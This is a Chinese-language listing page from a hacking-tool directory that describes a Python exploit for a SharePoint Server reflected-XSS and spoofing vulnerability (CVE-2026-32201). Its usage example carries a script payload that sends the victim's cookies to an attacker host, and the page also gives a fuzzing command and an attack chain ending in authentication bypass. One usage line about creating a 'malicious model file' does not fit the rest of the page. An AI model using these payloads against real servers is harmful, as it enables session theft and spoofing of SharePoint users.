Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-32201-exploit — Python 针对 CVE-2026-32201 的漏洞利用程序,该漏洞是 Microsoft SharePoint Server 中的反射型 XSS,可通过精心构造的 HTTP 请求实现未经身份验证的欺骗和数据篡改。 | Kitploit
工具/GitHubGitHub/b1tbit/cve-2026-32201-exploit
钓鱼工具漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

Python 针对 CVE-2026-32201 的漏洞利用程序,该漏洞是 Microsoft SharePoint Server 中的反射型 XSS,可通过精心构造的 HTTP 请求实现未经身份验证的欺骗和数据篡改。

查看仓库
164个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概述

针对 CVE-2026-32201 的 Python 漏洞利用程序——Microsoft SharePoint Server 中的输入验证不当,允许未经身份验证的网络欺骗(C:L/I:L)。

  • 受影响版本:SharePoint Server 2016 Enterprise、2019、Subscription Edition < 16.0.19725.20210;
  • 攻击向量:AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N;
  • 影响:通过伪造的通知/文档查看/更改敏感数据。

功能特性

  1. SharePoint 指纹识别。
  2. 构造 POST 请求以绕过输入验证(sender_override)。
  3. 可自定义的载荷(发件人、收件人、主题、带 XSS 的消息)。
  4. 响应分析以进行验证。

使用方法

  1. 将其保存为 exploit.py
  2. 运行它以创建恶意模型文件:
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

输出示例:

root@kitploit:~
[+] 检测到 SharePoint。
[*] 正在向 https://target.com/_layouts/15/notify.aspx 发送伪造请求
[+] 状态:200
[+] 可能成功:检查目标日志/邮件中是否存在伪造内容。

自定义配置

  • 端点模糊测试:ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • XSS 载荷:在 --message 中添加 JS 以窃取 Cookie
  • 攻击链:伪造 → 钓鱼链接 → 认证绕过

验证

  • 成功指标:200 OK + 响应中包含“sent/success”
  • 服务端:检查 ULS 日志/IIS 日志中是否存在异常请求
  • 影响:监控伪造发件人的邮件/文档,测试数据篡改
下载工具